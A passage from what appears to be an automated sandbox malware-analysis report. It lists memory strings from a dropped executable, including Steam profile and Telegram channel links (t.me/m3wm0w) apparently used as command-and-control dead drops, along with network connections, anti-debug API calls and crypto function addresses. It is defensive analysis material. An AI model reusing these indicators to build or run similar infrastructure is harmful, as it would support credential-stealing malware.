168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://store.steampowered.com/stats/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A47000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.00000000009CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/_~
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000000.1785190377.000000000045C000.00000008.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe.0.dr	String found in binary or memory: https://t.me/m3wm0w
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1812013102.0000000000A47000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/m3wm0w3
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/m3wm0w7
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/m3wm0wT
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A47000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/m3wm0wc
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe.0.dr	String found in binary or memory: https://t.me/m3wm0wp1up1Mozilla/5.0
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.00000000009CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/y~
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://telegram.org/img/t_logo_2x.png
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web.telegram.org
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown	HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.8:49711 version: TLS 1.2

System Summary

PE file has a writeable .text section

Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe.0.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Contains functionality to call native functions

Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe

Code function: 14_2_00401625 NtQueryInformationProcess,NtQueryInformationProcess,

14_2_00401625

Detected potential crypto function

Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Code function: 0_2_02830A40	0_2_02830A40
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Code function: 0_2_02832309	0_2_02832309
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_04E7B4A0	5_2_04E7B4A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_04E7B490	5_2_04E7B490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_02C81762	7_2_02C81762
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_02C8096D	7_2_02C8096D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_04BEB490	10_2_04BEB490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_04BE167D	10_2_04BE167D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_04BE1044	10_2_04BE1044
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_08CC3E98	10_2_08CC3E98
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_04401855	11_2_04401855
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_044015E5	11_2_044015E5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_04401670	11_2_04401670
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_04401364	11_2_04401364
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_04B6B4A0	13_2_04B6B4A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_04B6B490	13_2_04B6B490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_08B83A98	13_2_08B83A98
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0043E893	14_2_0043E893
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040C091	14_2_0040C091
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040E0A1	14_2_0040E0A1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00430141	14_2_00430141
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040E161	14_2_0040E161
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00440101	14_2_00440101
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0042C111	14_2_0042C111
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040C121	14_2_0040C121
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040C1C1	14_2_0040C1C1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_004401C1	14_2_004401C1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_004121E1	14_2_004121E1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040A181	14_2_0040A181
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00430251	14_2_00430251
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040C261	14_2_0040C261
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040A221	14_2_0040A221
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0042C221	14_2_0042C221
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040E231	14_2_0040E231
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_004122A1	14_2_004122A1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00412351	14_2_00412351
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040E301	14_2_0040E301
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00430311	14_2_00430311
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00440311	14_2_00440311
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0042C321	14_2_0042C321
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040A331	14_2_0040A331
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_004103C1	14_2_004103C1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0042C3C1	14_2_0042C3C1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_004123F1	14_2_004123F1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040E3F1	14_2_0040E3F1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040C381	14_2_0040C381
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040A411	14_2_0040A411
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040C421	14_2_0040C421
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_004104D1	14_2_004104D1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_004404D1	14_2_004404D1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_004144E1	14_2_004144E1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040E4A1	14_2_0040E4A1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_004124B1	14_2_004124B1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00410571	14_2_00410571
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040E571	14_2_0040E571
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0042C511	14_2_0042C511
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040A521	14_2_0040A521
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040C531	14_2_0040C531
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040A5C1	14_2_0040A5C1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040E641	14_2_0040E641
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00440611	14_2_00440611
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00410621	14_2_00410621
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040C631	14_2_0040C631
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0042C6C1	14_2_0042C6C1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_004106D1	14_2_004106D1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040C6D1	14_2_0040C6D1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040A6B1	14_2_0040A6B1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040A771	14_2_0040A771
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00440701	14_2_00440701
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040E711	14_2_0040E711
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_004327C1	14_2_004327C1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0042C781	14_2_0042C781
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_004127A1	14_2_004127A1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_004107A1	14_2_004107A1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00440811	14_2_00440811
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040C821	14_2_0040C821
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040A821	14_2_0040A821
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040A8C1	14_2_0040A8C1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0042C8D1	14_2_0042C8D1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040E951	14_2_0040E951
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00440951	14_2_00440951
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040A961	14_2_0040A961
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040C971	14_2_0040C971
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0042C9D1	14_2_0042C9D1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_004109F1	14_2_004109F1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00412991	14_2_00412991
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00408A41	14_2_00408A41
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040AA71	14_2_0040AA71
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040EA11	14_2_0040EA11
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040CA31	14_2_0040CA31
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040CAF1	14_2_0040CAF1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0042CAA1	14_2_0042CAA1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00410AB1	14_2_00410AB1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00412AB1	14_2_00412AB1
